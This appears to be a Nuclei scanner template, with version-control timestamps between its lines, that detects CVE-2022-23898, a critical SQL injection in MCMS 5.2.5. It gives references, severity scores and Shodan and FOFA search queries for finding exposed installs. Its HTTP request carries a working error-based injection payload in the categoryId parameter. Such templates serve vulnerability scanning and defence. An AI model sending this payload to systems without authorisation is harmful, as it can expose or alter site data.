2023-03-30 17:06:37 +00:00
id : CVE-2022-23898
info :
2023-04-13 15:39:52 +00:00
name : MCMS 5.2.5 - SQL Injection
2023-03-30 17:06:37 +00:00
author : Co5mos
2023-03-31 16:11:22 +00:00
severity : critical
2023-03-30 17:06:37 +00:00
description : |
2023-04-13 15:39:52 +00:00
MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-03-30 17:06:37 +00:00
reference :
2023-03-31 11:54:00 +00:00
- https://github.com/ming-soft/MCMS/issues/62
2023-03-30 17:06:37 +00:00
- https://github.com/advisories/GHSA-p94q-9q2m-pfh2
- https://nvd.nist.gov/vuln/detail/CVE-2022-23898
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-23898
cwe-id : CWE-89
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
epss-score : 0.01119
2023-03-30 17:06:37 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-03-30 17:17:02 +00:00
fofa-query : icon_hash="1464851260"
2023-03-31 16:11:22 +00:00
shodan-query : http.favicon.hash:1464851260
2023-06-04 08:13:42 +00:00
verified : true
2023-03-30 17:06:37 +00:00
tags : cve,cve2022,sqli,mcms
variables :
num : "999999999"
2023-04-27 04:28:59 +00:00
http :
2023-03-30 17:06:37 +00:00
- raw :
- |
POST /cms/content/list HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
categoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz
matchers :
- type : word
part : body
words :
2023-03-30 17:21:31 +00:00
- 'c8c605999f3d8352d7bb792cf3fdb25'
2023-04-13 15:39:52 +00:00
# Enhanced by md on 2023/04/13